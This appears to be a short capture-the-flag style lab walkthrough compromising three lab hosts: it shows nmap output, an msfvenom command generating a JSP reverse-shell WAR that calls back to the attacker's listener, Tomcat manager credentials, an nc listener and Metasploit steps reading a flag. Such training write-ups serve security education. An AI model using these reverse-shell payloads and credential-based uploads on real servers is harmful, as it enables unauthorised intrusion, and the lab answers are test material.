# The Live Engagement
First we have to login into the ip that was given ``` RDP to 10.129.86.5 with user "htb-student" and password "HTB_@cademy_stdnt!" ```
First we have to nmap scan the first host which is the 172.16.1.11 ``` # Nmap 7.92 scan initiated Tue Apr 30 02:56:03 2024 as: nmap -sC -sV -oN firsthost.nmap 172.16.1.11 Nmap scan report for status.inlanefreight.local (172.16.1.11) Host is up (0.026s latency). Not shown: 989 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Inlanefreight Server Status |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds 515/tcp open printer Microsoft lpd 1801/tcp open msmq? 2103/tcp open msrpc Microsoft Windows RPC 2105/tcp open msrpc Microsoft Windows RPC 2107/tcp open msrpc Microsoft Windows RPC 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=shells-winsvr | Not valid before: 2024-04-29T06:08:54 |_Not valid after: 2024-10-29T06:08:54 |_ssl-date: 2024-04-30T06:57:03+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: SHELLS-WINSVR | NetBIOS_Domain_Name: SHELLS-WINSVR | NetBIOS_Computer_Name: SHELLS-WINSVR | DNS_Domain_Name: shells-winsvr | DNS_Computer_Name: shells-winsvr | Product_Version: 10.0.17763 |_ System_Time: 2024-04-30T06:56:57+00:00 8080/tcp open http Apache Tomcat 10.0.11 |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat/10.0.11 |_http-favicon: Apache Tomcat Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-os-discovery: | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3) | Computer name: shells-winsvr | NetBIOS computer name: SHELLS-WINSVR\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2024-04-29T23:56:57-07:00 | smb2-time: | date: 2024-04-30T06:56:57 |_ start_date: N/A |_clock-skew: mean: 1h23m59s, deviation: 3h07m49s, median: -1s |_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: , NetBIOS MAC: 00:50:56:94:17:44 (VMware) | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Apr 30 02:57:03 2024 -- 1 IP address (1 host up) scanned in 59.90 seconds ``` Then we will seach for exploit for the web server tomcat
But it failed
It tried both the IP but still failed
Then we are going to change the payload for the exploit ``` msfvenom -l payloads | grep java ```
{% code overflow="wrap" %} ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o shell.war ``` {% endcode %}
Click the Manager App ``` User - tomcat Pass - Tomcatadm ```
Upload a war file
After several to upload the war reverse shell it became successful
Set up a listener and go access the shell ``` nc -lnvp 9001 ```
* **Second host - 172.16.1.12 or blog.inlanefrieght.local**
Use reload\_all to refresh the modules in msfconsole ``` reload_all ```
``` run shell cat /customscripts/flag.txt ```
* **Third host - 172.16.1.13**
``` use 1 options set rhost 172.16.1.13 set lhost 172.16.1.5 ```
``` run ```